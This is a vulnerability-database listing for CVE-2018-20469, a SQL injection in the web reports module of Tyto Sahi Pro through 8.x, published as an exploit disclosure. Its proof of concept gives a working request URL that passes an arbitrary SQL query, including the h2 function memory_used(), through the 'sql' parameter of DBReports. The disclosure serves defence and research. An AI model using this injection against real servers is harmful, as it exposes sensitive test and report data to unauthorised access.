| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Sahi pro 8.x - SQL Injection Vulnerability | 18 Jun 201900:00 | – | zdt | |
| CVE-2018-20469 | 2 May 202106:31 | – | circl | |
| CVE-2018-20469 | 17 Jun 201913:31 | – | cve | |
| CVE-2018-20469 | 17 Jun 201913:31 | – | cvelist | |
| Sahi pro 8.x - SQL Injection | 18 Jun 201900:00 | – | exploitpack | |
| CVE-2018-20469 | 17 Jun 201914:15 | – | nvd | |
| CVE-2018-20469 | 17 Jun 201914:15 | – | osv | |
| Sahi Pro 8.x SQL Injection | 18 Jun 201900:00 | – | packetstorm | |
| Sql injection | 17 Jun 201914:15 | – | prion | |
| PT-2019-10073 · Tyto · Tyto Sahi Pro | 17 Jun 201900:00 | – | ptsecurity |
# Exploit Title: Sahi pro ( <= 8.x ) sensitive information disclosure by SQL injection.
# Date: 17-06-2019
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
# Vendor Homepage: https://sahipro.com/
# Software Link: https://sahipro.com/downloads-archive/
# Version: 7.x , <= 8.x
# Tested on: Windows 10
# CVE : CVE-2018-20469
# POC-URL : https://barriersec.com/2019/06/cve-2018-20469-sahi-pro/
Description :
An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to SQL injection. This can be exploited to inject SQL queries and run standard h2 system functions.
POC :
vulnerable URL :
''' replace the ip and port of the remote sahi pro server machine '''
# here sql query is passed directly as part of GET request which can be modified to run standard h2 database functions. in the following POC , "memory_used()" function is injected , which is reflected in "status" column of reports page.
http://<ip>:<port>/_s_/dyn/pro/DBReports?sql=SELECT DISTINCT memory_used() AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS.* FROM SUITEREPORTS,SCRIPTREPORTSData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation